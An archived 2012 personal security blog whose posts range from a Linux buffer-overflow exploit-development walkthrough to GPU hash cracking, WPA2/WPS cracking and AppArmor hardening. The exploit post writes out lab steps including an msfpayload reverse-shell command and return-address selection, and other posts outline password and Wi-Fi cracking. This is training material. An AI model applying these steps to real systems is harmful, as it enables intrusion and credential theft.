Friday, December 28, 2012

EXPLOIT-DEV : Simple Buffer Overflow exploit writing on Linux

I am going to do a simple buffer overflow on 32-bit Linux. The target application software is namely vuln-server which you can download here.



Why I use this software? It is because this echo server is acting difference to normal echo server. It will echo back the message in reverse order.

Does it matter? Yes, it does matter when you are developing the exploit. The shellcode should be reversed and the return address should not be reversed. It is quite difference to the normal exploit writing.

I develop this exploit under BackTrack 5r3 (32-bit). Let's compile this echo server with gcc with the following switches in order to disable the stack protection.

gcc vuln-server.c -o vuln-server -static -fno-stack-protector -z norelro -ggdb

Run the vuln-server :

./vuln-server 5700

Open another terminal to run the client :

nc -vv 127.0.0.1 5700
Connection to 127.0.0.1 5700 port[tcp/*] succeeded!
Type QUIT on a line by itself to quit

Enter something on the client, for example :

Connection to 127.0.0.1 5700 port[tcp/*] succeeded!
Type QUIT on a line by itself to quit
hello world
dlrow olleh

You will find out that the message you entered is echo back in reverse order.

The server side will display :

127.0.0.1:41959 hello world

Now, write a python script to send 500 bytes of data to the echo server.



Run it and you will find out that the EIP register is overwritten by A's.

Go to create a 500 unique characters to overwrite the EIP.

./pattern_create.rb 500

Copy the result to the captioned python script and replace the junk with the pattern.

Run the python the modified python script again and you will find out that the EIP is overwritten with 0x416c3341.

Reverse the address and find the offset with the following command :

./pattern_offset.rb 0x41336c41 500
[*] Exact match at offset 339

So, the offset is 339.

Now, to create the shellcode with msfpayload and encoded with alpha_upper encoder in order to avoid the bad characters.

msfpayload linux/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 R | msfencode -e x86/alpha_upper

However, we need to reverse the shellcode with the following python script.

shellcode = "blah blah ...."
shellcode = shellcode[::-1]
shellcode.encode("hex")
print shellcode

Then, add back the "\x" to the shellcode on every two characters.

Okay, it is high time to find the return address.

msfelfscan -j esp vuln-server
[vuln-server]
0x08064e49 push esp; ret
0x08064ea7 push esp; ret
0x08065f71 push esp; ret
0x08081949 push esp; ret
0x08085df9 push esp; retn 0x8934
0x080a56e9 push esp; ret
0x080c37ab jmp esp
0x080c388f jmp esp
0x080c38b7 jmp esp
0x080c3c3f jmp esp
0x080c3d17 jmp esp
0x080c3da7 jmp esp
0x080c3db3 jmp esp
0x080c3dd3 jmp esp
0x080c532b jmp esp <----- selected this one

I select the last one as the return address.

As I mentioned, this echo server is acting difference to others. The flow of the exploit is not running forward but backward. The final exploit python script is like that :



Now, run the listener at port 4444 and run the echo server then run the exploit python script. Yeah, we got the shell.



Therefore, never run any program with root.

That's all! See you.

Tuesday, December 18, 2012

Great talks about Security products and how they suck

The following talks are presented by Joe McCray. He will show you how to bypassing the very expensive (sometimes) security products which claimed themselves can protect your network/system from being attack.

He also urge all the bosses to put more budget on security guys and security training but not just purchase a (or some) security product(s) only.

Bio :

Joe McCray - Advanced Security Lead Instructor

Joseph McCray is the lead / head instructor for Advanced Security by Academy of Computer Education. Joe oversees the quality of instruction of all of our hacking and forensics courses and makes sure that our entire team of instructors has what they need and is prepared to the fullest for each and every class. Joe has been leading Advanced Security's hacking and forensics training classes since 2004.

Joe McCray is a retired Air Force Veteran and has been in security for over 15 years. Joe has been involved in over 150 very high level pentesting assessments and has some major hacking accomplishments that he can share with his classes. His extensive experience and deep knowledge, mixed with his comedic style has lead Joe to be one of the most highly sought after speaking experts in the industry. Joe makes speaking appearances and gives seminars at major events in the security community such as Black Hat, DefCon, BruCon, Hacker Halted and more. Joe is the recipient of the 2009 EC-Council Instructor Circle of Excellence Award and the 2010 EC-Council Instructor of the Year Award. Joe also runs a successful international security training website called Strategic Security.


Please watch them in an open mind. Here we go :

Hacktivity 2012 - Big Bang Theory : The Evolution of Pentesting High Security Environments





Defcon 18 - You Spent All That Money and You Still Got Owned???





You Spent All That Money and You Still Got Owned????




That's all! See you.

Friday, December 14, 2012

HOWTO : Setup My Back|Track 5r3 Personal Supercomputer

My Hardware

CPU : Intel i7-3930K (6 cores, 12 cores with Hyper-Threading, Socket 2011)
Motherboard : ASUS SaberTooth X79
RAM : Corsair Vengeance DDR3 1600 32GB (4GB x 8)
Display Card : Inno3D nVidia GeForce GTX 590 384bit 3072MB DDR5 x 2
Hard Drive : WD SATA III 3TB
Power Supply : Seasonic X-series 1250W
Cooling : Water cooling system with EK products
Case : Lian Li PC-z70 (modified)

My Operating System

Back|Track 5r3 64-bit system as the host operating system for the captioned hardware.

My Problem

When boot up the Back|Track 5r3 and started "startx", the screen of the monitor will be black out. It is because I have nVidia display card in the system.

The only way to solve it is when booting up to the Back|Track 5r3, press "Tab" in the boot option menu. Then enter the following at the end of "text splash vga=791".

text splash vga=791 nomodeset

After that, the Back|Track 5r3 will boot up after entering the command "startx". Install the system as usual to your hard drive.

After the installation is completed, do not reboot the system. Edit the following file instead after mounted the partitions of the hard drive.

nano /etc/default/grub

Locate 'GRUB_CMDLINE_LINUX_DEFAULT="text splash vga=791"' and append the following :

text splash vga=791 nomodeset

and it will be looking like this :

GRUB_CMDLINE_LINUX_DEFAULT="text splash vga=791 nomodeset"

Then execute the following commands :

update-grub
fix-splash

Reboot the system.

My nVidia and CUDA drivers

Install the nVidia current driver from the repos of Back|Track :

apt-get update
apt-get install nvidia-current nvidia-current-modaliases nvidia-settings

After the nVidia driver is installed, execute the following command :

nvidia-xconfig

Now, it is high time to install the CUDA driver. Go to the CUDA Developer site and download the driver. Make sure you selected Ubuntu 10.04 version.

64-bit version :

wget http://developer.download.nvidia.com/compute/cuda/5_0/rel-update-1/installers/cuda_5.0.35_linux_64_ubuntu10.04-1.run

32-bit version :

wget http://developer.download.nvidia.com/compute/cuda/5_0/rel-update-1/installers/cuda_5.0.35_linux_32_ubuntu10.04-1.run

After the download, make it the be executable.

For example :

chmod +x cuda_5.0.35_linux_64_ubuntu10.04-1.run

Then, install it and follow the instruction on screen. Accept the default settings.

cuda_5.0.35_linux_64_ubuntu10.04-1.run

The last step for the installation is to set up the path of the executable files and libraries.

nano /root/.bashrc

Append the following line at the end of the file.

PATH=$PATH:/usr/local/cuda-5.0/bin

nano /etc/ld.so.conf.d/cuda.conf

Add the following lines to the file.

/usr/local/cuda-5.0/lib
/usr/local/cuda-5.0/lib64

Then execute the following command and reboot afterward.

ldconfig

My Hash Cracking Power

We use oclhashcat+ to test the performance of the cracking power of this hardware.

cd /pentest/passwod/oclhastcat+
./cudaExample0.sh
./cudaExample400.sh
./cudaExample500.sh

If you can see the hashes are cracked, the CUDA is setting up properly.

My Addtional Softwares

This host is for hashes and passwords cracking. The penentration testing work will be doing on virtual machines.

I will install virtualbox, sysinfo, shutter, synaptic, gtk-recordmydesktop, and sensors-applet to enhance the function of this host.

By the way, I need to fix the minor bugs of the Back|Track 5r3.

Bug #1 :

There is no sound since Back|Track 5.

mkdir /root/.config/autostart
nano /root/.config/autostart/pulseaudio.desktop

Add the following lines to the file.

[Desktop Entry]
Type=Application
Exec=/usr/bin/pulseaudio
Hidden=false
NoDisplay=false
X-GNOME-Autostart-enabled=true
Name=Pulseaudio
Comment=Start Pulseaudio

Bug #2 :

Wicd cannot connect to D-Bus since Back|Track 5.

dpkg-reconfigure wicd
update-rc.d wicd defaults

That's all! See you.

Tuesday, December 11, 2012

HOWTO : Install edb-debugger on Ubuntu 12.10

When we are doing debugging work on Windows system, we will use Immunity Debugger or Olldbg. Those are very good debuggers for Windows system. When doing debugging work on Linux, there is a command line version, namely GDB (The GNU Project Debugger). How about the GUI version of Linux debugger? Yes, there is one available, it is namely Evan's Debugger (edb-debugger).

The current version is 0.9.18. However, it is not working properly on Ubuntu 12.04 LTS and 12.10. The available deb package version 0.9.17 cannot work properly on the captioned version of Ubuntu too.

The only solution is to install the svn version (current is 0.9.19). I am going to show you how.

Step 1 :

sudo apt-get update
sudo apt-get install libqt4-dev libboost1.48-all-dev subversion

Step 2 :

svn checkout http://edb-debugger.googlecode.com/svn/trunk/ edb-debugger
cd edb-debugger
qmake
make
sudo make install

Step 3 :

To see where is the edb installed to.

whereis edb

The following is showing the 64-bit system :

/bin/edb /lib64/edb

Go back to the user directory, such as /home/samiux.

cd /home/samiux
mkdir .edb

Step 4 :

Run the program :

sudo edb

Once the program is launched, there is a popup saying that the library files cannot be located. You need to go to the "Directories" at the "Preferences".

Symbol Directory - /home/samiux/.edb
Plugin Directory - /lib64/edb/
Session Directory - /home/samiux/.edb

That's all! See you.

Saturday, December 01, 2012

Love Your Neighbour as Yourself

Again, this time I am not going to talk about IT or Infosec.

A video is better than a thousand words ....



That's all! See you.

Friday, November 30, 2012

Quit smoking now!

This time I am not going to talk about IT or Infosec. I am going to show you a Thai made quit smoking advertising. If you are a smoker, I would like you to have some minutes to watch. May be you will agree with the video.



That's all! See you.

Friday, November 09, 2012

HOWTO : Make Sure Your Server Is Really Hidden

You are so brilliant to find a way to hide your server from the internet. However, you are not 100% sure. By using Penetrating Testing tools, you can confirm your hidden server is really hidden.

Here we use the tools in the BackTrack 5 r3.

nmap -sS -sV -v -Pn samiux.com

cd /pentest/enumeration/dns/fierce/

perl fierce.pl -dns samiux.com

*** where "samiux.com" is the domain name, here is only an example.

From the last output result, make sure your server IP address is not listed when she says that she is hidden.

Now, your server IP address is not shown. So, your server is really hidden? I guess not, maybe. To further test it with the searchdns.netcracft.net for the history records. You may find your server's IP address history records unfortunately (if any).

If your server IP address is in the history record of netcracft, you may consider to change the IP address when necessary in order to hide your server from the internet.

That's all! See you.

Tuesday, November 06, 2012

DerbyCon 2012 - Intro to Linux System Hardening

Too sad that this talk is only from System Administrator to System Administrator but not for Information Security (InfoSec) guys. The speaker, Chris Jenks (rattis), is in the view of System Administrator to harden Linux system instead of an InfoSec view. However, it is an InfoSec Conference. Strange.

In general, a System Administrator has no knowledge of about how malicious hackers thinking and doing. Their knowledge about InfoSec is limited. They just guessing what they done can prevent from being attack.

Description of the Talk (Written by the speaker) :

This introductory level talk is designed for people that know a little bit about Linux and a how to run Backtrack. The main target audience would have a junior level administration experience, who also knows about Bactrack.

It looks at how to do basic system hardening on CentOS and Ubuntu, using systems with default installs. It then looks at using those same tactics to systems running Backtrack. Along the way, I discuss why I don’t like using virtual machines, multiboot, liveCD or USB to run Bactrack in the field, and why I think it should be ran on a dedicated machine.

BIO of Speaker :

Experience includes fifteen years of network engineering and thirteen years system administration. He is currently studying Information Assurance at Eastern Michigan University. That degree will supplement his degrees in Computer Information Systems and Anthropology. Certifications include Security+ and Offensive Security Wireless Professional. Involved in Michigan’s Locksport scene, and a regular at Arbsec and MiSec. He’s the ”rat” in the Rats and Rouges InfoSec Podcast.



My Own Opinion :

Basically, BackTrack Linux is a Linux distribution for Penetration Testing. That mean, it is a tool for attackers (you can think like this in order to make your mind clear). Just like Thai boxers who will not wear any protective equipment to protect themselve during the fight. It is because those protective equipment may causing obstruction to their performance in the fight.

However, the speaker of the talk advised users of BackTrack to enable firewall (iptables) and configure the Apache web server to listen to the localhost (127.0.0.1). He also suggests to re-configure the SSH to not allow root login and create a sudoer account. More tools, such as denyhosts, fail2ban, tripwire and logcheck, are also advised to be installed in BackTrack.

If firewall is enabled and other tools (such as denyhosts, fail2ban, tripwire) to be installed in BackTrack, it is something like shooting on our foot when using it to do the pentesting. Meanwhile, the speaker do not know the function of the Apache web server at the BackTrack as he do not know why she is there. Moreover, SSH in BackTrack is for attack purpose instead of administration function. Almost all the tools in BackTrack requires root privilege to run, therefore, the sudoer account is not required.

BackTrack is not a normal Linux distribution for general users to use daily and casually. It is a special designed distribution for Penetration Testing; it is designed for attackers (you can think that Penetration Tester is an attacker but he is not a bad guy). It is designed to attack but not to defence.

Weird enough that the speaker has some qualifications of InfoSec. Overall, this talk is misleading in the view of a BackTrack user. Not recommended.

UPDATED on November 10, 2012 :

I find out that he had another 2 more talks on the same topic and spreading the same wrong information to the listeners. Too sad.

I am doubt that if the SysAdmin hack back (if any), what can he get? What can he do? As he said, shut down the attacker's box? The attacker is just using a BackTrack and if the root password has been changed, there is no chance for a SysAdmin doing something evil to the attacker. It is really doubt, in my opinion.

He even don't know the difference between 127.0.0.1 and 0.0.0.0 as he suggest to turn off CUPS as it is running as root. However, CUPS is listening to localhost and the user account running is already root. So, what does he want?

By the way, he use Denyhosts to block the unwanted SSH access, that mean he do not know how to use SSH to perform an attack.

He also suggest to disable the mail function. However, how can we (attacker) to perform an attack via mail?

I am doubt that he do not know how to use BackTrack. Not kidding!

Finally, one thing that I do agree with him is to change the root password to something else and may be changing the hostname too.

Anyway, he is just a System Administrator only but not an Information Security guy.





Wednesday, October 24, 2012

HOWTO : Activate nVidia GeForce GT650M on 15" MacBook Pro Retina

You are required to install the following packages.

gfxCardStatus will switch to nVidia GT650M automatically when the software running is capable for 3D acceleration, such as VirtualBox. Or, you can switch it manually.

CUDA will be loaded automatically when the softwares are using CUDA feature.

That's all! See you.

Tuesday, October 16, 2012

HOWTO : nVidia Optimus on Back|Track 5 r3

(A) Hardware (nVidia Optimus)

Brand : Asus n82jv-vx072v
CPU : Intel i5 450M, 2.4Ghz
RAM : 4096MB DDR3 1066
Display card : nVidia GeForce GT335M 1G VRAM DDR3

(B) Hardware (nVidia GeForce)

Any computer comes with nVidia GeForce display card that is CUDA capable.

Problem

You will be experienced to get a black screen when boot up and you cannot go further to get the Back|Track to be installed. This tutorial not only apply for Back|Track but also apply for other Linux distributions.

Solution

Step 1 :

When bootup in the "Boot Option Menu", press "Tab" (Other version of Linux will be different) and append the following to the end of the kernel option line :

text splash vga=791 i915.modeset=1 nomodeset

*** Remarks : "i915.modeset=1 nomodest" is for Optimus only. If nVidia GeForce, just need "nomodeset".

Step 2 :

Once booted up and installed, do not restart and continue to test. Mount up the hard drive and you need to edit as the following :

nano /etc/default/grub

Locate 'GRUB_CMDLINE_LINUX_DEFAULT="text splash vga=791"' and append the following :

text splash vga=791 i915.modeset=1 nomodeset

and it will be looking like this :

GRUB_CMDLINE_LINUX_DEFAULT="text splash vga=791 i915.modeset=1 nomodeset"

update-grub

The following command is for Back|Track only.

fix-splash

Step 3 :

Reboot your computer.

Step 4 (If you do Step 4a, DO NOT do this step, skip it.) :

Not to run "startx". This step should be running without X. For other Linux distributions, press "Alt + F2" to console mode.

Download CUDA 5.0 for 64-bit :

wget http://developer.download.nvidia.com/compute/cuda/5_0/rel/installers/cuda_5.0.35_linux_64_ubuntu10.04.run

Download CUDA 5.0 for 32-bit :

wget http://developer.download.nvidia.com/compute/cuda/5_0/rel/installers/cuda_5.0.35_linux_32_ubuntu10.04.run

chmod +x cuda_5.0.35_linux_64_ubuntu10.04.run

or

chmod +x cuda_5.0.35_linux_32_ubuntu10.04.run

Then run the following command.

./cuda_5.0.35_linux_64_ubuntu10.04.run

or

./cuda_5.0.35_linux_32_ubuntu10.04.run

Answer "accept" and install nVidia driver (current version is 304.54) as well as nVidia CUDA Toolkit (current is 5.0.35). If you want to install samples, please do. When asking for the path or directory, please press enter to accept the default setting.

Remarks : Please note that CUDA has an updated version.

Step 4a (Don't do with Step 4 together, only one of it) :

Not to run "startx". This step should be running without X. For other Linux distributions, press "Alt + F2" to console mode.

add-apt-repository ppa:ubuntu-x-swat/x-updates

Edit : The x-swat ppa does not work anymore. Use Back|Track repos instead. Just do the following commands only.

apt-get update
apt-get install nvidia-current nvidia-current-modaliases nvidia-settings

Your nVidia driver has been installed (current version is 304.60).

Download CUDA 5.0 for 64-bit :

wget http://developer.download.nvidia.com/compute/cuda/5_0/rel/installers/cuda_5.0.35_linux_64_ubuntu10.04.run

Download CUDA 5.0 for 32-bit :

wget http://developer.download.nvidia.com/compute/cuda/5_0/rel/installers/cuda_5.0.35_linux_32_ubuntu10.04.run

chmod +x cuda_5.0.35_linux_64_ubuntu10.04.run

or

chmod +x cuda_5.0.35_linux_32_ubuntu10.04.run

Then run the following command.

./cuda_5.0.35_linux_64_ubuntu10.04.run

or

./cuda_5.0.35_linux_32_ubuntu10.04.run

Answer "accept" and DO NOT install nVidia driver. Only install nVidia CUDA Toolkit (current is 5.0.35). If you want to install samples, please do. When asking for the path or directory, please press enter to accept the default setting.

Remarks : Please note that CUDA has an updated version.

Step 5 :

The below is for Back|Track only. If other Linux distributions, please replace "root" with any username.

nano /root/.bashrc

Append the following :

PATH=$PATH:/usr/local/cuda-5.0/bin
LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usr/local/cuda-5.0/lib:/usr/local/cuda-5.0/lib64:/lib
export PATH
export LD_LIBRARY_PATH

Or, you can do the following instead for any Linux distributions.

nano /etc/ld.so.conf.d/cuda.conf

/usr/local/cuda-5.0/bin
/usr/local/cuda-5.0/lib
/usr/local/cuda-5.0/lib64

Save and then run the following command :

ldconfig

Then, reboot.

Step 6 : (For nVidia Optimus only)

To install Bumblebee :

sudo add-apt-repository ppa:bumblebee/stable

sudo apt-get update

sudo apt-get install bumblebee bumblebee-nvidia

Then, reboot the box.

Step 7 : (For nVidia Optimus only)

To test it to see if nVidia driver is workable or not :

glxspheres

optirun glxspheres

Step 8 : (Optional)

Go to the official site of pyrit.

http://code.google.com/p/pyrit/downloads/list

Download pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing). Back|Track 5 r3 may installed pyrit but not for the CUDA.

tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
python setup.py install

tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
python setup.py install

To test if the installation is correct or not. If you are not using Optimus, the "optirun" is not required.

optirun pyrit list_cores
optirun pyrit benchmark
optirun pyrit benchmark_long

Finally, thank you for Malko to test it and confirm it is working.

That's all! See you.

Saturday, October 13, 2012

HOWTO : Cracking WPA2 Passpharse Made Easy

Many people out there still think that cracking WPA2 passpharse requires dictionaries. However, it is not true.

You can brute force the WPA2 passpharse with the help of GPUs. Here is my discoveries on April 16, 2010 and May 22, 2011.



If the wifi router is equipped with WPS (Wifi Protected Setup) and it is enabled, to crack it is very easy with the tool namely reaver.



In additional, it is risky to use public wifi or public free wifi too. No matter they have passpharse or not. (Please refer to "See Also" for details) You are also be informed that there are some high power and long range wifi adaptors in the market.

Alfa Network produces some high power and long range wifi adaptors, such as Alfa AWUS036H and Alfa AWUS036NHR. They can connect to the vicitm's wifi router in the distance of 1KM+ away.

That's all! See you.

See Also :

HOWTO : Sniffing SSL with ettercap on Back|Track 5

HOWTO : Protect you from being ARP spoofing

Wednesday, October 03, 2012

EXPLOIT-DEV : CentOS 6.3 vs Ubuntu 12.04

There are many methods to exploit Local File Inclusion (LFI) of a vulnerability PHP web application in Linux systems. Some of them are invalid in the latest version of Linux distributions, I think. For example, those methods are processes injection, log files injection, session files injection and etc.

Unfortunately, in my recently research, I find out that PHP session files of CentOS 6.3 (maybe applied for previous versions) in default settings can be injected and loaded. However, Ubuntu 12.04 cannot. (Remarks : I did not check the other Linux distributions for this research.)

When the PHP session files can be injected and loaded along with LFI vulnerability, a remote shell can be obtained by attackers.

Basically, CentOS is a clone of RedHat Enterprise Linux.

Reference : Web vulnerabilities to gain access to the system

That's all! See you.

Sunday, September 30, 2012

HOWTO : Web Application Attack

The following tutorials are created by Prateek Gianchandani who has interests in the field of Penetration Testing, Web Application Security and Intrusion Detection. He is currently a researcher for InfoSec Institute. In the past he has worked for security-based startups. In his pastime he maintains his website searching-eye.com.

Burp Suite Walkthrough

Inserting Vulnerabilities in Web Applications

Hacking Web Authentication – Part 1

Hacking Web Authentication – Part 2

W3af walkthrough and tutorial – Part 1

w3af walkthrough and tutorial part 2 – Discovery and Audit plugins

w3af walkthrough and tutorial part 3 – Remaining plugins

w3af walkthrough and tutorial part 4 – w3af tools, profiles and scripting

That's all! See you.

HOWTO : SQLi Lab Series by Audi-1

The following is the SQLi Lab, which is created by Audi-1 who is an Offensive Security Certified Expert (OSCE). He explains how SQLi works.

SQLi Lab Series - Introduction

SQLi Lab Series - Error Based

SQLi Lab Series - Double Query / SubQuery

SQLi Lab Series - Blind Injection - Boolean Based

SQLi Lab Series - Blind Injection - Time Based

SQLi Lab Series - Using Outfile / Dumpfile

SQLi Lab Series - Post Based

SQLi Lab Series - Double Query

SQLi Lab Series - Update Query

SQLi Lab Series - Insert Query / Headers

SQLi Lab Series - Cookie Based

Second Order Injection

Bypassing blacklist filters (Part 1)

Bypassing blacklist filters (Part 2)

The whole series of the video of SQLi Lab Series

That's all! See you.

Wednesday, September 26, 2012

Course Review - Cracking the Perimeter (CTP)

Before enroll for the course of Cracking the Perimeter, you need to solve a problem. This problem is to confirm you have some related skills before taking this course. This course is not designed for newbies.

If you do not have knowledge of penetration testing, I recommend you to take Penetration Testing with BackTrack.

The Course

Debugger for Windows are used mostly in the course for the purpose of Anti-virus bypass, backdooring and exploit writing. You should have some knowledge on x86 assembly language, Linux, Windows and web site scripting languages, such as PHP as well. You are also required to do a lot of researches on the topic of exploit writing. In addition, some more extra exercises to improve your skills are recommended. The course also cover web application attack.

One of the modules in the course I like most and hate most is HP Openview Network Node Manager NNM 7.5.0. In the beginning, I overlook this module and think that it is a very specific case. The solution will not apply to others exploit writing. Later, I find this module very interesting and I spend a lot of time to understand what is going on. Fortunately, I fully understand what it is finally.

Mati (the founder of Offensive Security) has a talk at DefCon 16 about this exploit writing where he states that he cannot solve this problem in the early beginning. Here you are :



You should enroll for the exam within 90 days after the lab access time expire. Otherwise, you need to pay for the exam.

The Challenge

The Challenge have 47 hours and 45 minutes for you to solve a series of problems. You need to submit the report within 24 hours after the challenge ends.

Finally, the exam was over and the report was submitted. Within 3 business days, I received an email telling me that I passed the challenge. I am now an Offensive Security Certified Expert (OSCE).

The Conclusion

In conclusion, this course will teach you about exploit writing and some skills of AV bypass and backdooring. You need to have some skills on Penetration Testing before taking this course. This course is an eye-opener, you can learn a lot of things during the course. Make sure you fully understand the course materials. Recommended!

Tuesday, September 04, 2012

HOWTO : Apparmor for VirtualBox on Ubuntu 12.04

Apparmor is a kind of application firewall which is similar to SELinux. Apparmor is installed by default for Ubuntu.

The apparmor for VirtualBox is not existed in /etc/apparmor.d/ and you should build your own. You can copy the following source code to the directory and enable it.

Step 1 :

sudo apt-get install apparmor-utils

Make sure Virtualbox is installed.

Step 2 :

usr.bin.VBox



Copy the captioned source code and placed it to /etc/apparmor.d/ and name them as the name that is underlined.

Step 3 :

sudo aa-enforce /etc/apparmor.d/usr.bin.VBox

That's all! See you.

REFERENCE

Apparmor manual for Ubuntu

HOWTO : Apparmor for xChat on Ubuntu 12.04

Apparmor is a kind of application firewall which is similar to SELinux. Apparmor is installed by default for Ubuntu.

The apparmor for xChat is not existed in /etc/apparmor.d/ and you should build your own. You can copy the following source code to the directory and enable it.

Step 1 :

sudo apt-get install apparmor-utils
sudo apt-get install xchat

Step 2 :

usr.bin.xchat



Make sure the line #19, #34 and #36 are match the installed version of Python. If you upgraded the Python to other version, make sure to change it accordingly; otherwise, xChat will not run as it is blocked by apparmor.

Copy the captioned source code and placed it to /etc/apparmor.d/ and name it as "usr.bin.xchat"

Step 3 :

After making the changes (if any), then enable it.

sudo aa-enforce /etc/apparmor.d/usr.bin.xchat

That's all! See you.

REFERENCE

Apparmor manual for Ubuntu

HOWTO : Apparmor for Firefox on Ubuntu 12.04

Apparmor is a kind of application firewall which is similar to SELinux. Apparmor is installed by default for Ubuntu.

The apparmor for Firefox is already installed to /etc/apparmor.d/ but it is not enabled by default.

Step 1 :

sudo apt-get install apparmor-utils

Step 2 :



Make sure the line #120 to #127 are match your language that is installed in your Ubuntu. The line #122 to #123 and #126 to #127 are showing the Traditional Chinese of Public and Downloads directories.

Step 3 :

After making the changes (if any), then enable it.

sudo aa-enforce /etc/apparmor.d/usr.bin.firefox

That's all! See you.

REFERENCE

Apparmor manual for Ubuntu

Wednesday, August 22, 2012

EXPLOIT-DEV : Quick TFTP Server Pro 2.1 Case Study

Quick TFTP Server Pro is a multi-threaded tftp server and telnet server for Microsoft Windows . It designed to allow network administrators and users to save and write files from various network equipment , and allow users to login to the server to execute various commands, such as listing file and directory information, reverse ping network equipment.

The current version 2.1 is vulnerable to Buffer Overflow which is announced on March 26, 2008 and Directory Traversal Vulnerability which is announced on November 5, 2011.

I only focus on the Buffer Overflow vulnerability. This piece of software does not fix the problem since 2008 after the vulnerability is discovered. I wonder to know the reason why.

Then I make up my mind to investigate. After the enquiry, it is confirmed that this piece of software is only exploitable on Windows XP SP2 and below. Windows XP SP3 or up cannot be exploited even it is vulnerability. Why?

I find out that this piece of software comes with no dll file and it is a standalone executable file. After the Windows XP SP3, Microsoft implemented Data Execution Prevention (DEP) and it enforces non-executable pages on the stack that prevent the execution of arbitrary shellcode.

In addition, this software has no other modules file (dll) that is not compiled with SafeSEH and all the system files are SafeSEHed. Although you can find a pointer at unicode.nls but because of null byte there is no chance to make the shellcode to work.

At least, I find out that so far. If anyone find out any method to exploit this software on Windows XP SP3 or up, please let me know. By the way, the ret2libc and ROP methods I have not been tried yet.

Therefore, it is only affect Windows XP SP2 and below. Since Windows XP SP2 is not supported by Microsoft any more, I think the developer of the software think that it is not necessary to fix the vulnerability.

That's all! See you.

Thursday, August 16, 2012

HOWTO : Back|Track 5 r3 on Gigabyte TouchNote T1028X/M1028

Gigabyte TouchNote T1028X/M1028 equipped with Intel Atom N280 and eGalax touch screen. It runs Back|Track 5 r3 flawlessly except touchpad. This tutorial is telling you how to overcome this problem.

The kernel version of Back|Track 5 r3 is 3.2.6 and the touch screen is functioning flawlessly.

Touchscreen Hardware

"lsusb" shows the following :

Bus 005 Device 002: ID 0eef:0001 D-WAV Scientific Co., Ltd eGalax TouchScreen

Step 1 :

Boot up the 32-bit version of Back|Track 5 r3 USB stick which is created by Unetbootin or DVD-ROM. On the menu screen, press "Tab" and append the following to the end of the line.

i8042.noloop=1 reboot=b

Then install as usual and then reboot.

Step 2 :

After login, enter the following :

nano /etc/default/grub

Append "i8042.noloop=1 reboot=b" to "GRUB_CMDLINE_LINUX_DEFAULT".

It will look like this :

GRUB_CMDLINE_LINUX_DEFAULT="quiet splash i8042.noloop=1 reboot=b"

Save and exit.

Then execute the following commands :

update-grub
fix-splash


Then power off the computer and switch it on again.

That's all! See you.

Saturday, August 11, 2012

HOWTO : Encrypt the Home Directory in Ubuntu

You may want to encrypt the home working directory or any user's working home directory if you have not been set it up during the installation of Ubuntu.

Step 1 :

sudo apt-get install ecryptfs-utils

Step 2 :

adduser tempuser admin

Logout and re-login as tempuser.

Step 3 :

sudo ecryptfs-migrate-home -u samiux

Logout and re-login as samiux. But DO NOT reboot your system.

If you are not asking for the "Passphrase", you should enter the following command :

sudo ecryptfs-add-passphrase

Step 4 (Optional) :

You can check the Passphrase at any time by the following command :

sudo ecryptfs-unwrap-passphrase

Save the "Passphrase" somewhere and keep it safe for manual recovery.

Step 5 (Optional) :

I suggest you to encrypt the swap too.

sudo ecryptfs-setup-swap

Step 6 :

Then, if everything is working fine, you can delete the ramdonized file and delete the tempuser.

sudo rm -rf /home/samiux.*
sudo deluser --remove-home tempuser

That's all! See you.

Tuesday, July 31, 2012

Torified Ubuntu VPN Server

Tor allows you to anonymity online. It protects your privacy and defend yourself against network surveillance and traffic analysis.

The setup of Tor is very complicated and sometimes you will fail to make it to work. The most easy way is to download Tor Browser. However, it has some limitations and the main problem is that it is for web browsing only.

The drawback of using Tor is the speed. It is quite slow as the traffic passes a lot of nodes in order to hide your IP address and traffic. Your IP will be changed every 10 minutes. The IP is not belonged to your home country.

Learn more about Tor.

I created a Torified Ubuntu VPN Server in order to overcome some limitations of Tor but except the speed. It is still under heavy development. The final product will be released soon.

Update

NightHawk - Torified Ubuntu VPN Server is released on August 3, 2012. You can download it at official site.

NightHawk in Action



Installation and Configuration



That's all! See you.

Sunday, July 29, 2012

The Corrs - Full acoustic concert




00:23 Only When I sleep
04:55 What Can I do?
09:48 -Radio
14:25 Toss The Feathers
17:56 Everybody Hurts
23:50 Dreams
27:48 Runaway
32:40 Forgiven, Not Forgotten
38:00 At Your Side
43:00 Little Wing
48:00 No Frontiers
52:48 Queen of Hollywood
57:40 Old Town
1:01:00 Lough Erin Shore
1:05:38 So Young

The Corrs - What Can I Do





Lyrics

I haven't slept at all in days
It's been so long since we've talked
And I have been here many times
I just don't know what I'm doing wrong

What can I do to make you love me
What can I do to make you care
What can I say to make you feel this
What can I do to get you there

There's only so much I can take
And I just got to let it go
And who knows I might feel better
If I don't try and I don't hope

What can I do to make you love me
What can I do to make you care
What can I say to make you feel this
What can I do to get you there

No more waiting, no more aching
No more fighting, no more trying

Maybe there's nothing more to say
And in a funny way I'm calm
Because the power is not mine
I'm just gonna let it fly

What can I do to make you love me
What can I do to make you care
What can I say to make you feel this
What can I do to get you there

Love me

Saturday, July 28, 2012

VEGA - Web application vulnerabilites scanner

Vega is an open source platform to test the security of web applications. Vega can help you find and validate SQL Injections, Cross-Site Scripting (XSS), inadvertently disclosed sensitive information, and other vulnerabilities. It is written in Java, GUI based, and runs on Linux, OS X, and Windows.



That's all! See you.

Get Windows systems password without hash decyption

Almost all the Windows system versions are affected. The following video is not made by me and it shows you how.



That's all! See you.

Friday, July 27, 2012

Why you need to learn hacking skills?

System Administrator and Programmer can be an Ethical Hacker too, not just only Penetration Tester.

Ethical Hackers and Hackers are speaking the same language, using the same tools and playing the same game.

Learn to hire a thief to try to steal something but don't hire a cop.



That's all! See you.

Wednesday, July 25, 2012

Enterprise WiFi Worms, Backdoors and Botnets for fun & profit

Windows 7 has a feature to create a Wifi access point on your laptop. Hackers will take advantage this feature to leverage to compromise your networks by mean of worms and/or backdoors with social engineering technique to build a botnet.

Vivek Ramachandran is going to show you the concept and how it works.



That's all! See you.

Saturday, July 21, 2012

Revolution OS

What is GNU? What is Open Source? What is Linux and how it grows?

Want to know? Just watch this video.



That's all! See you.

Web Warriors

This is another a little bit out-dated video (around the year of 2003) that worth to watch.

